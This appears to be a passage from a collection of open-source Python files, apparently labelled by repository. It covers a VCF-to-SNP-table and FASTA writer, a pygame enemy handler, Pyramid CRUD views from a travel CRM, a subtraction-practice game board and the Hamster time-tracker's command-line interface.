(sort chrom and pos) for sample in self.fastas: for chrom in sorted(self.fastas[sample]): for pos in sorted(self.fastas[sample][chrom]): if len(self.counts[chrom][pos]) > 1: # if more that one ALT allele, keep it allele = ''.join(self.fastas[sample][chrom][pos]) # convert list to string # check if allele is empty if allele: self.informative_pos.setdefault(sample, {}).setdefault(chrom, {})\ .setdefault(pos, []).append(''.join(allele)) else: print "No allele infor for {}, {}:{}".format(sample, chrom, pos) def count_snps(self): print ' Counting SNPs' # free up resources not needed anymore self.counts.clear() # All samples should have the same number of informative SNPs # so any can be used to get the stats randomsample = random.choice(self.informative_pos.keys()) filteredcount = 0 informativecount = 0 # Account for multiple chromosome for chrom in self.fastas[randomsample]: filteredcount += len(self.fastas[randomsample][chrom]) # number of positions informativecount += len(self.informative_pos[randomsample][chrom]) # print to screen print "\nTotal filtered SNPs: {}".format(filteredcount) print "Total informative SNPs: {}\n".format(informativecount) # write to file fh = open(self.section4, "a") # append mode fh.write("Total filtered SNPs: {}\n".format(filteredcount)) fh.write("Total informative SNPs: {}\n\n".format(informativecount)) fh.close() def write_fasta(self): print ' Writing sample fasta files' # free up resources not needed anymore self.fastas.clear() # Create output folder for fasta files if not os.path.exists(self.output): os.makedirs(self.output) if isinstance(self.informative_pos, dict): for sample, chromosomes in sorted(self.informative_pos.iteritems()): samplepath = os.path.join(self.output, sample + '.fas') fh = open(samplepath, 'w') fh.write(">{}\n".format(sample)) if isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, dict): for pos, allele in sorted(positions.iteritems()): if isinstance(allele, list): fh.write(''.join(allele)) # convert list to text fh.write("\n") def write_root(self): print ' Writing root fasta file' rootpath = os.path.join(self.output, 'root.fas') randomsample = random.choice(self.informative_pos.keys()) rootseq = list() fh = open(rootpath, 'w') if isinstance(self.informative_pos, dict): for chrom in self.informative_pos[randomsample]: for pos in sorted(self.informative_pos[randomsample][chrom]): rootseq.append(self.refgenome[chrom].seq[pos - 1]) fh.write(">root\n" + "{}\n".format(''.join(rootseq))) def write_snp_table(self): print ' Writing SNP table' fh = open(self.table, 'w') randomsample = random.choice(self.informative_pos.keys()) ref_pos = list() ref_call = list() # reference if isinstance(self.informative_pos, dict): for chrom in self.informative_pos[randomsample]: for pos in sorted(self.informative_pos[randomsample][chrom]): ref_pos.append(''.join(chrom) + '-' + str(pos)) ref_call.append(self.refgenome[chrom].seq[pos - 1]) fh.write("reference_pos\t{}\n".format("\t".join(ref_pos))) fh.write("reference_call\t{}\n".format("\t".join(ref_call))) # sample if isinstance(self.informative_pos, dict): for sample, chromosomes in self.informative_pos.iteritems(): fh.write("{}".format(sample)) if isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, dict): for pos, allele in sorted(positions.iteritems()): if isinstance(allele, list): allele = ''.join(allele) # convert list to text fh.write("\t{}".format(allele)) fh.write("\n") fh.close() if __name__ == '__main__': from argparse import ArgumentParser parser = ArgumentParser(description='Generate SNP table and aligned fasta files from VCF files') parser.add_argument('-r', '--ref', metavar='ref.fasta', required=True, help='reference genome used in the VCF files') parser.add_argument('-v', '--vcf', metavar='vcfFolder', required=True, help='location of the VCF files') parser.add_argument('-q', '--minQUAL', metavar='minQUAL', type=int, required=True, help='minimum QUAL value in VCF file') parser.add_argument('-ac1', '--ac1', metavar='AC1Report.txt', required=True, help='output file where positions having both AC=1 and AC=2 are reported') parser.add_argument('-s4', '--section4', metavar='section4.txt', required=True, help='output file where total filtered SNP positions and total informative SNPs are reported') parser.add_argument('-o', '--output', metavar='fastaOutFolder', required=True, help='folder where the output fasta files will be output') parser.add_argument('-t', '--table', metavar='fastaTable.tsv', required=True, help='the SNP table') # Get the arguments into an object arguments = parser.parse_args() SnpTableMaker(arguments)
jcnix/abg
enemies.py
# -*- coding: utf-8 -*- # File: enemy.py # Author: Casey Jones # # Created on July 20, 2009, 4:48 PM # # This file is part of Alpha Beta Gamma (abg). # # ABG is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ABG is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ABG. If not, see <http://www.gnu.org/licenses/>. #class to handle all enemies on screen import sys, pygame, frametime, properties, random from enemy import Enemy class Enemies: enemies = [] blackSurface = pygame.Surface([Enemy.enemy.get_width(), Enemy.enemy.get_height()]) blackSurface.fill([0,0,0]) screen = None def set_screen(self, screen): self.screen = screen def create(self): #range that the current player ship can shoot where_spawn = random.randint(1, properties.width - Enemy.enemy.get_width()) lenemy = Enemy(where_spawn) self.enemies.append(lenemy) def move(self, bullet): to_update = [] if frametime.can_create_enemy(): self.create() to_delete = [] to_update += [x.enemyrect for x in self.enemies] if len(self.enemies) > 0: for i in range(len(self.enemies)): self.enemies[i].update(bullet) self.screen.blit(self.blackSurface, self.enemies[i].enemyrect) self.screen.blit(Enemy.enemy, self.enemies[i].enemyrect) #If enemy goes off the bottom of the screen if self.enemies[i].enemyrect.top > 800: to_delete.append(i) for x in to_delete: self.remove(x) to_update += [x.enemyrect for x in self.enemies] return to_update def getEnemies(self): return self.enemies def remove(self, index): try: to_update = self.enemies[index].enemyrect self.screen.blit(self.blackSurface, self.enemies[index].enemyrect) del self.enemies[index] return to_update except IndexError: print("IndexError for enemy {0} of {1}".format(index, len(self.enemies))) def game_over(self): for i in range(len(self.enemies)): self.screen.blit(self.blackSurface, self.enemies[i].enemyrect) del self.enemies[:]
mazvv/travelcrm
travelcrm/views/accounts_items.py
# -*-coding: utf-8-*- import logging from pyramid.view import view_config, view_defaults from pyramid.httpexceptions import HTTPFound from . import BaseView from ..models import DBSession from ..models.account_item import AccountItem from ..lib.bl.subscriptions import subscribe_resource from ..lib.utils.common_utils import translate as _ from ..forms.accounts_items import ( AccountItemForm, AccountItemSearchForm ) from ..lib.events.resources import ( ResourceCreated, ResourceChanged, ResourceDeleted, ) log = logging.getLogger(__name__) @view_defaults( context='..resources.accounts_items.AccountsItemsResource', ) class AccountsItemsView(BaseView): @view_config( request_method='GET', renderer='travelcrm:templates/accounts_items/index.mako', permission='view' ) def index(self): return { 'title': self._get_title(), } @view_config( name='list', xhr='True', request_method='POST', renderer='json', permission='view' ) def list(self): form = AccountItemSearchForm(self.request, self.context) form.validate() qb = form.submit() return qb.get_serialized() @view_config( name='view', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='view' ) def view(self): if self.request.params.get('rid'): resource_id = self.request.params.get('rid') account_item = AccountItem.by_resource_id(resource_id) return HTTPFound( location=self.request.resource_url( self.context, 'view', query={'id': account_item.id} ) ) result = self.edit() result.update({ 'title': self._get_title(_(u'View')), 'readonly': True, }) return result @view_config( name='add', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='add' ) def add(self): return { 'title': self._get_title(_(u'Add')), } @view_config( name='add', request_method='POST', renderer='json', permission='add' ) def _add(self): form = AccountItemForm(self.request) if form.validate(): account_item = form.submit() DBSession.add(account_item) DBSession.flush() event = ResourceCreated(self.request, account_item) event.registry() return { 'success_message': _(u'Saved'), 'response': account_item.id } else: return { 'error_message': _(u'Please, check errors'), 'errors': form.errors } @view_config( name='edit', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='edit' ) def edit(self): account_item = AccountItem.get(self.request.params.get('id')) return { 'item': account_item, 'title': self._get_title(_(u'Edit')), } @view_config( name='edit', request_method='POST', renderer='json', permission='edit' ) def _edit(self): account_item = AccountItem.get(self.request.params.get('id')) form = AccountItemForm(self.request) if form.validate(): form.submit(account_item) event = ResourceChanged(self.request, account_item) event.registry() return { 'success_message': _(u'Saved'), 'response': account_item.id } else: return { 'error_message': _(u'Please, check errors'), 'errors': form.errors } @view_config( name='copy', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='add' ) def copy(self): account_item = AccountItem.get_copy(self.request.params.get('id')) return { 'action': self.request.path_url, 'item': account_item, 'title': self._get_title(_(u'Copy')), } @view_config( name='copy', request_method='POST', renderer='json', permission='add' ) def _copy(self): return self._add() @view_config( name='delete', request_method='GET', renderer='travelcrm:templates/accounts_items/delete.mako', permission='delete' ) def delete(self): return { 'title': self._get_title(_(u'Delete')), 'rid': self.request.params.get('rid') } @view_config( name='delete', request_method='POST', renderer='json', permission='delete' ) def _delete(self): errors = False ids = self.request.params.getall('id') if ids: try: items = DBSession.query(AccountItem).filter( AccountItem.id.in_(ids) ) for item in items: DBSession.delete(item) event = ResourceDeleted(self.request, item) event.registry() DBSession.flush() except: errors=True DBSession.rollback() if errors: return { 'error_message': _( u'Some objects could not be delete' ), } return {'success_message': _(u'Deleted')} @view_config( name='subscribe', request_method='GET', renderer='travelcrm:templates/accounts_items/subscribe.mako', permission='view' ) def subscribe(self): return { 'id': self.request.params.get('id'), 'title': self._get_title(_(u'Subscribe')), } @view_config( name='subscribe', request_method='POST', renderer='json', permission='view' ) def _subscribe(self): ids = self.request.params.getall('id') for id in ids: account_item = AccountItem.get(id) subscribe_resource(self.request, account_item.resource) return { 'success_message': _(u'Subscribed'), }
OriHoch/pysiogame
game_boards/game070.py
# -*- coding: utf-8 -*- import classes.level_controller as lc import classes.game_driver as gd import classes.extras as ex import classes.board import random import pygame class Board(gd.BoardGame): def __init__(self, mainloop, speaker, config, screen_w, screen_h): self.level = lc.Level(self,mainloop,5,10) gd.BoardGame.__init__(self,mainloop,speaker,config,screen_w,screen_h,13,11) def create_game_objects(self, level = 1): self.board.decolorable = False self.board.draw_grid = False color = (234,218,225) self.color = color self.grey = (200,200,200) self.font_hl = (100,0,250) self.task_str_color = ex.hsv_to_rgb(200,200,230) self.activated_col = self.font_hl white = (255,255,255) self.bg_col = white self.top_line = 3#self.board.scale//2 if self.mainloop.scheme is not None: if self.mainloop.scheme.dark: self.bg_col = (0,0,0) self.level.games_per_lvl = 5 if self.level.lvl == 1: rngs = [20,50,10,19] self.level.games_per_lvl = 3 elif self.level.lvl == 2: rngs = [50,100,20,49] self.level.games_per_lvl = 3 elif self.level.lvl == 3: rngs = [100,250,50,99] self.level.games_per_lvl = 3 elif self.level.lvl == 4: rngs = [250,500,100,249] elif self.level.lvl == 5: rngs = [500,1000,100,499] elif self.level.lvl == 6: rngs = [700,1500,250,699] elif self.level.lvl == 7: rngs = [1500,2500,500,1499] elif self.level.lvl == 8: rngs = [2500,5000,1500,2499] elif self.level.lvl == 9: rngs = [5000,10000,2500,4999] elif self.level.lvl == 10: rngs = [10000,84999,5000,9999] data = [39,18] self.points = self.level.lvl #stretch width to fit the screen size x_count = self.get_x_count(data[1],even=None) if x_count > 39: data[0] = x_count self.data = data self.vis_buttons = [1,1,1,1,1,1,1,0,0] self.mainloop.info.hide_buttonsa(self.vis_buttons) self.layout.update_layout(data[0],data[1]) scale = self.layout.scale self.board.level_start(data[0],data[1],scale) self.n1 = random.randrange(rngs[0],rngs[1]) self.n2 = random.randrange(rngs[2],rngs[3]) self.sumn1n2 = self.n1-self.n2 self.n1s = str(self.n1) self.n2s = str(self.n2) self.sumn1n2s = str(self.sumn1n2) self.n1sl = len(self.n1s) self.n2sl = len(self.n2s) self.sumn1n2sl =len(self.sumn1n2s) self.cursor_pos = 0 self.correct = False self.carry1l = [] self.carry10l = [] self.resultl = [] self.nums1l = [] self.nums2l = [] self.ship_id = 0 self.digits = ["0","1","2","3","4","5","6","7","8","9"] if self.lang.lang == 'el': qm = ";" else: qm = "?" question = self.n1s + " - " + self.n2s + " = " + qm self.board.add_unit(1,0,data[0]-3-(max(self.n1sl,self.n2sl))*3 ,3,classes.board.Label,question,self.bg_col,"",21) self.board.units[-1].align = 1 #borrow 1 for i in range(self.n1sl - 1): self.board.add_unit(data[0]-6-i*3,0,1,1,classes.board.Label,"-",self.bg_col,"",0) self.board.add_unit(data[0]-5-i*3,0,1,1,classes.board.Letter,"",self.bg_col,"",1) self.carry1l.append(self.board.ships[-1]) self.carry1l[-1].set_outline(self.grey, 2) self.carry1l[-1].pos_id = i self.board.units[-1].align = 2 #add 10 for i in range(self.n1sl - 1): self.board.add_unit(data[0]-3-i*3,1,1,1,classes.board.Label,"+",self.bg_col,"",0) self.board.add_unit(data[0]-2-i*3,1,1,1,classes.board.Letter,"",self.bg_col,"",1) self.carry10l.append(self.board.ships[-1]) self.carry10l[-1].set_outline(self.grey, 2) self.carry10l[-1].pos_id = i self.board.units[-1].align = 2 self.board.add_unit(data[0]-2-self.n1sl*3,0,2,1,classes.board.Label,"-1",self.bg_col,"",0) self.board.add_unit(data[0]-2-self.n1sl*3,1,2,1,classes.board.Label,"+10",self.bg_col,"",0) #first number for i in range(self.n1sl): self.board.add_unit(data[0]-3-i*3,2,3,3,classes.board.Label,self.n1s[-(i+1)],self.bg_col,"",21) self.nums1l.append(self.board.units[-1]) self.nums1l[-1].font_color = self.grey self.nums1l[-1].pos_id = i #second number i = 0 for i in range(self.n2sl): self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,self.n2s[-(i+1)],self.bg_col,"",21) self.nums2l.append(self.board.units[-1]) self.nums2l[-1].pos_id = i i += 1 self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,"-",self.bg_col,"",21) self.plus_label = self.board.units[-1] #line #line = "―" * (self.sumn1n2sl*2) self.board.add_unit(data[0]-self.sumn1n2sl*3,8,self.sumn1n2sl*3,1,classes.board.Label,"",self.bg_col,"",21) self.draw_hori_line(self.board.units[-1]) #self.board.units[-1].text_wrap = False #result for i in range(self.sumn1n2sl): self.board.add_unit(data[0]-3-i*3,9,3,3,classes.board.Letter,"",self.bg_col,"",21) self.resultl.append(self.board.ships[-1]) self.resultl[-1].set_outline(self.grey, 2) self.resultl[-1].pos_id = i self.resultl[0].set_outline(self.activated_col, 3) self.home_square = self.resultl[0] self.board.active_ship = self.home_square.unit_id self.activable_count = len(self.board.ships) for each in self.board.ships: each.immobilize() self.deactivate_colors() self.reactivate_colors() def draw_hori_line(self,unit): w = unit.grid_w*self.board.scale h = unit.grid_h*self.board.scale center = [w//2,h//2] canv = pygame.Surface([w, h-1]) canv.fill(self.bg_col) pygame.draw.line(canv,self.grey,(0,self.top_line),(w,self.top_line),3) unit.painting = canv.copy() unit.update_me = True def handle(self,event): gd.BoardGame.handle(self, event) #send event handling up if self.show_msg == False: if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT: self.home_sqare_switch(self.board.active_ship+1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT: self.home_sqare_switch(self.board.active_ship-1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP: if self.home_square in self.resultl: self.home_sqare_switch(self.board.active_ship-self.n1sl+1) elif self.home_square in self.carry10l: self.home_sqare_switch(self.board.active_ship-self.n1sl+1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN: self.home_sqare_switch(self.board.active_ship+self.n1sl-1) elif event.type == pygame.KEYDOWN and event.key != pygame.K_RETURN and not self.correct: lhv = len(self.home_square.value) self.changed_since_check = True if event.key == pygame.K_BACKSPACE: if lhv > 0: self.home_square.value = self.home_square.value[0:lhv-1] else: char = event.unicode if (len(char)>0 and lhv < 3 and char in self.digits): if self.home_square in self.resultl: if lhv == 1: s = self.home_square.value + char if s[0] == "0": self.home_square.value = char else: n = int(s) if n < 20: self.home_square.value = str(n % 10) else: self.home_square.value = char else: self.home_square.value = char elif self.home_square in self.carry1l: if char == "1": self.home_square.value = "1" self.carry10l[self.home_square.pos_id].value = "10" else: self.home_square.value = "" self.carry10l[self.home_square.pos_id].value = "" self.carry10l[self.home_square.pos_id].update_me = True elif self.home_square in self.carry10l: if lhv == 0: if char == "1": self.home_square.value = "10" elif lhv == 1: if char == "0": self.home_square.value = "10" else: self.home_square.value = "" else: if char == "1": self.home_square.value = "10" else: self.home_square.value = "" if self.home_square.value == "10": self.carry1l[self.home_square.pos_id].value = "1" else: self.carry1l[self.home_square.pos_id].value = "" self.carry1l[self.home_square.pos_id].update_me = True self.home_square.update_me = True self.mainloop.redraw_needed[0] = True elif event.type == pygame.MOUSEBUTTONUP: self.home_sqare_switch(self.board.active_ship) def home_sqare_switch(self, activate): if activate < 0 or activate > self.activable_count: activate = self.activable_count - self.sumn1n2sl if activate >= 0 and activate < self.activable_count: self.board.active_ship = activate self.home_square.update_me = True if self.board.active_ship >= 0: self.home_square.set_outline(self.grey, 2) self.deactivate_colors() self.home_square = self.board.ships[self.board.active_ship] self.home_square.set_outline(self.activated_col, 3) self.reactivate_colors() self.home_square.font_color = self.font_hl self.home_square.update_me = True self.mainloop.redraw_needed[0] = True def deactivate_colors(self): for each in self.board.ships: each.font_color = self.grey each.update_me = True for each in self.board.units: each.font_color = self.grey each.update_me = True def reactivate_colors(self): self.plus_label.font_color = self.font_hl self.board.units[0].font_color = self.task_str_color if self.home_square in self.carry1l: self.carry10l[self.home_square.pos_id].font_color = self.font_hl elif self.home_square in self.carry10l: self.carry1l[self.home_square.pos_id].font_color = self.font_hl elif self.home_square in self.resultl: if self.home_square.pos_id > 0: self.carry1l[self.home_square.pos_id-1].font_color = self.font_hl if self.home_square.pos_id >= 0 and self.home_square.pos_id < self.n1sl-1: self.carry10l[self.home_square.pos_id].font_color = self.font_hl if (self.n1sl > self.home_square.pos_id): self.nums1l[self.home_square.pos_id].font_color = self.font_hl if (self.n2sl > self.home_square.pos_id): self.nums2l[self.home_square.pos_id].font_color = self.font_hl self.resultl[self.home_square.pos_id].font_color = self.font_hl def update(self,game): game.fill(self.color) gd.BoardGame.update(self, game) #rest of painting done by parent def check_result(self): s = "" for each in reversed(self.resultl): s += each.value if s == self.sumn1n2s: self.update_score(self.points) self.level.next_board() else: if self.points > 0: self.points -= 1 self.level.try_again()
projecthamster/hamster
src/hamster-cli.py
#!/usr/bin/env python3 # - coding: utf-8 - # Copyright (C) 2010 Matías Ribecky <matias at mribecky.com.ar> # Copyright (C) 2010-2012 Toms Bauģis <toms.baugis@gmail.com> # Copyright (C) 2012 Ted Smith <tedks at cs.umd.edu> # This file is part of Project Hamster. # Project Hamster is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # Project Hamster is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with Project Hamster. If not, see <http://www.gnu.org/licenses/>. '''A script to control the applet from the command line.''' import sys, os import argparse import re import gi gi.require_version('Gdk', '3.0') # noqa: E402 gi.require_version('Gtk', '3.0') # noqa: E402 from gi.repository import GLib as glib from gi.repository import Gdk as gdk from gi.repository import Gtk as gtk from gi.repository import Gio as gio from gi.repository import GLib as glib import hamster from hamster import client, reports from hamster import logger as hamster_logger from hamster.about import About from hamster.edit_activity import CustomFactController from hamster.overview import Overview from hamster.preferences import PreferencesEditor from hamster.lib import default_logger, stuff from hamster.lib import datetime as dt from hamster.lib.fact import Fact logger = default_logger(__file__) def word_wrap(line, max_len): """primitive word wrapper""" lines = [] cur_line, cur_len = "", 0 for word in line.split(): if len("%s %s" % (cur_line, word)) < max_len: cur_line = ("%s %s" % (cur_line, word)).strip() else: if cur_line: lines.append(cur_line) cur_line = word if cur_line: lines.append(cur_line) return lines def fact_dict(fact_data, with_date): fact = {} if with_date: fmt = '%Y-%m-%d %H:%M' else: fmt = '%H:%M' fact['start'] = fact_data.start_time.strftime(fmt) if fact_data.end_time: fact['end'] = fact_data.end_time.strftime(fmt) else: end_date = dt.datetime.now() fact['end'] = '' fact['duration'] = fact_data.delta.format() fact['activity'] = fact_data.activity fact['category'] = fact_data.category if fact_data.tags: fact['tags'] = ' '.join('#%s' % tag for tag in fact_data.tags) else: fact['tags'] = '' fact['description'] = fact_data.description return fact class Hamster(gtk.Application): """Hamster gui. Actions should eventually be accessible via Gio.DBusActionGroup with the 'org.gnome.Hamster.GUI' id. but that is still experimental, the actions API is subject to change. Discussion with "external" developers welcome ! The separate dbus org.gnome.Hamster.WindowServer is still the stable recommended way to show windows for now. """ def __init__(self): # inactivity_timeout: How long (ms) the service should stay alive # after all windows have been closed. gtk.Application.__init__(self, application_id="org.gnome.Hamster.GUI", #inactivity_timeout=10000, register_session=True) self.about_controller = None # 'about' window controller self.fact_controller = None # fact window controller self.overview_controller = None # overview window controller self.preferences_controller = None # settings window controller self.connect("startup", self.on_startup) self.connect("activate", self.on_activate) # we need them before the startup phase # so register/activate_action work before the app is ran. # cf. https://gitlab.gnome.org/GNOME/glib/blob/master/gio/tests/gapplication-example-actions.c self.add_actions() def add_actions(self): # most actions have no parameters # for type "i", use Variant.new_int32() and .get_int32() to pack/unpack for name in ("about", "add", "clone", "edit", "overview", "preferences"): data_type = glib.VariantType("i") if name in ("edit", "clone") else None action = gio.SimpleAction.new(name, data_type) action.connect("activate", self.on_activate_window) self.add_action(action) action = gio.SimpleAction.new("quit", None) action.connect("activate", self.on_activate_quit) self.add_action(action) def on_activate(self, data=None): logger.debug("activate") if not self.get_windows(): self.activate_action("overview") def on_activate_window(self, action=None, data=None): self._open_window(action.get_name(), data) def on_activate_quit(self, data=None): self.on_activate_quit() def on_startup(self, data=None): logger.debug("startup") # Must be the same as application_id. Won't be required with gtk4. glib.set_prgname(self.get_application_id()) # localized name, but let's keep it simple. glib.set_application_name("Hamster") def _open_window(self, name, data=None): logger.debug("opening '{}'".format(name)) if name == "about": if not self.about_controller: # silence warning "GtkDialog mapped without a transient parent" # https://stackoverflow.com/a/38408127/3565696 _dummy = gtk.Window() self.about_controller = About(parent=_dummy) logger.debug("new About") controller = self.about_controller elif name in ("add", "clone", "edit"): if self.fact_controller: # Something is already going on, with other arguments, present it. # Or should we just discard the forgotten one ? logger.warning("Fact controller already active. Please close first.") else: fact_id = data.get_int32() if data else None self.fact_controller = CustomFactController(name, fact_id=fact_id) logger.debug("new CustomFactController") controller = self.fact_controller elif name == "overview": if not self.overview_controller: self.overview_controller = Overview() logger.debug("new Overview") controller = self.overview_controller elif name == "preferences": if not self.preferences_controller: self.preferences_controller = PreferencesEditor() logger.debug("new PreferencesEditor") controller = self.preferences_controller window = controller.window if window not in self.get_windows(): self.add_window(window) logger.debug("window added") # Essential for positioning on wayland. # This should also select the correct window type if unset yet. # https://specifications.freedesktop.org/wm-spec/wm-spec-1.3.html if name != "overview" and self.overview_controller: window.set_transient_for(self.overview_controller.window) # so the dialog appears on top of the transient-for: window.set_type_hint(gdk.WindowTypeHint.DIALOG) else: # toplevel window.set_transient_for(None) controller.present() logger.debug("window presented") def present_fact_controller(self, action, fact_id=0): """Present the fact controller window to add, clone or edit a fact. Args: action (str): "add", "clone" or "edit" """ assert action in ("add", "clone", "edit") if action in ("clone", "edit"): action_data = glib.Variant.new_int32(int(fact_id)) else: action_data = None # always open dialogs through actions, # both for consistency, and to reduce the paths to test. app.activate_action(action, action_data) class HamsterCli(object): """Command line interface.""" def __init__(self): self.storage = client.Storage() def assist(self, *args): assist_command = args[0] if args else "" if assist_command == "start": hamster_client._activities(sys.argv[-1]) elif assist_command == "export": formats = "html tsv xml ical".split() chosen = sys.argv[-1] formats = [f for f in formats if not chosen or f.startswith(chosen)] print("\n".join(formats)) def toggle(self): self.storage.toggle() def start(self, *args): '''Start a new activity.''' if not args: print("Error: please specify activity") return 0 fact = Fact.parse(" ".join(args), range_pos="tail") if fact.start_time is None: fact.start_time = dt.datetime.now() self.storage.check_fact(fact, default_day=dt.hday.today()) id_ = self.storage.add_fact(fact) return id_ def stop(self, *args): '''Stop tracking the current activity.''' self.storage.stop_tracking() def export(self, *args): args = args or [] export_format, start_time, end_time = "html", None, None if args: export_format = args[0] (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) facts = self.storage.get_facts(start_time, end_time) writer = reports.simple(facts, start_time.date(), end_time.date(), export_format) def _activities(self, search=""): '''Print the names of all the activities.''' if "@" in search: activity, category = search.split("@") for cat in self.storage.get_categories(): if not category or cat['name'].lower().startswith(category.lower()): print("{}@{}".format(activity, cat['name'])) else: for activity in self.storage.get_activities(search): print(activity['name']) if activity['category']: print("{}@{}".format(activity['name'], activity['category'])) def activities(self, *args): '''Print the names of all the activities.''' search = args[0] if args else "" for activity in self.storage.get_activities(search): print("{}@{}".format(activity['name'], activity['category'])) def categories(self, *args): '''Print the names of all the categories.''' for category in self.storage.get_categories(): print(category['name']) def list(self, *times): """list facts within a date range""" (start_time, end_time), __ = dt.Range.parse(" ".join(times or [])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) self._list(start_time, end_time) def current(self, *args): """prints current activity. kinda minimal right now""" facts = self.storage.get_todays_facts() if facts and not facts[-1].end_time: print("{} {}".format(str(facts[-1]).strip(), facts[-1].delta.format(fmt="HH:MM"))) else: print((_("No activity"))) def search(self, *args): """search for activities by name and optionally within a date range""" args = args or [] search = "" if args: search = args[0] (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) self._list(start_time, end_time, search) def _list(self, start_time, end_time, search=""): """Print a listing of activities""" facts = self.storage.get_facts(start_time, end_time, search) headers = {'activity': _("Activity"), 'category': _("Category"), 'tags': _("Tags"), 'description': _("Description"), 'start': _("Start"), 'end': _("End"), 'duration': _("Duration")} # print date if it is not the same day print_with_date = start_time.date() != end_time.date() cols = 'start', 'end', 'duration', 'activity', 'category' widths = dict([(col, len(headers[col])) for col in cols]) for fact in facts: fact = fact_dict(fact, print_with_date) for col in cols: widths[col] = max(widths[col], len(fact[col])) cols = ["{{{col}: <{len}}}".format(col=col, len=widths[col]) for col in cols] fact_line = " | ".join(cols) row_width = sum(val + 3 for val in list(widths.values())) print() print(fact_line.format(**headers)) print("-" * min(row_width, 80)) by_cat = {} for fact in facts: cat = fact.category or _("Unsorted") by_cat.setdefault(cat, dt.timedelta(0)) by_cat[cat] += fact.delta pretty_fact = fact_dict(fact, print_with_date) print(fact_line.format(**pretty_fact)) if pretty_fact['description']: for line in word_wrap(pretty_fact['description'], 76): print(" {}".format(line)) if pretty_fact['tags']: for line in word_wrap(pretty_fact['tags'], 76): print(" {}".format(line)) print("-" * min(row_width, 80)) cats = [] total_duration = dt.timedelta() for cat, duration in sorted(by_cat.items(), key=lambda x: x[1], reverse=True): cats.append("{}: {}".format(cat, duration.format())) total_duration += duration for line in word_wrap(", ".join(cats), 80): print(line) print("Total: ", total_duration.format()) print() def version(self): print(hamster.__version__) if __name__ == '__main__': from hamster.lib import i18n i18n.setup_i18n() usage = _( """ Actions: * add [activity [start-time [end-time]]]: Add an activity * stop: Stop tracking current activity. * list [start-date [end-date]]: List activities * search [terms] [start-date [end-date]]: List activities matching a search term * export [html|tsv|ical|xml] [start-date [end-date]]: Export activities with the specified format * current: Print current activity * activities: List all the activities names, one per line. * categories: List all the categories names, one per line. * overview / preferences / add / about: launch specific window * version: Show the Hamster version Time formats: * 'YYYY-MM-DD hh:mm': If start-date is missing, it will default to today. If end-date is missing, it will default to start-date. * '-minutes': Relative time in minutes from the current date and time. Note: * For list/search/export a "hamster day" starts at the time set in the preferences (default 05:00) and ends one minute earlier the next day. Activities are reported for each "hamster day" in the interval. Example usage: hamster start bananas -20 start activity 'bananas' with start time 20 minutes ago hamster search pancakes 2012-08-01 2012-08-30 look for an activity matching terms 'pancakes` between 1st and 30st August 2012. Will check against activity, category, description and tags """) hamster_client = HamsterCli() app = Hamster() logger.debug("app instanciated") import signal signal.signal(signal.SIGINT, signal.SIG_DFL) # gtk3 screws up ctrl+c parser = argparse.ArgumentParser( description="Time tracking utility", epilog=usage, formatter_class=argparse.RawDescriptionHelpFormatter) # cf. https://stackoverflow.com/a/28611921/3565696 parser.add_argument("--log", dest="log_level", choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'), default='WARNING', help="Set the logging level (default: %(default)s)") parser.add_argument("action", nargs="?", default="overview") parser.add_argument('action_args', nargs=argparse.REMAINDER, default=[]) args, unknown_args = parser.parse_known_args() # logger for current script logger.setLevel(args.log_level) # hamster_logger for the rest hamster_logger.setLevel(args.log_level) if not hamster.installed: logger.info("Running in devel mode") if args.action in ("start", "track"): action = "add" # alias elif args.action == "prefs": # for backward compatibility action = "preferences" else: action = args.action if action in ("about", "add", "edit", "overview", "preferences"): if action == "add" and args.action_args: assert not unknown_args, "unknown options: {}".format(unknown_args) # directly add fact from arguments id_ = hamster_client.start(*args.action_args) assert id_ > 0, "failed to add fact" sys.exit(0) else: app.register() if action == "edit": assert len(args.action_args) == 1, ( "edit requires exactly one argument, got {}" .format(args.action_args)) id_ = int(args.action_args[0]) assert id_ > 0, "received non-positive id : {}".format(id_) action_data = glib.Variant.new_int32(id_) else: action_data = None app.activate_action(action, action_data) run_args = [sys.argv[0]] + unknown_args logger.debug("run {}".format(run_args)) status = app.run(run_args) logger.debug("app exited") sys.exit(status) elif hasattr(hamster_client, action): getattr(hamster_client, action)(*args.action_args) else: sys.exit(usage % {'prog': sys.argv[0]})
wiiiky/ydict
pydict/about.py
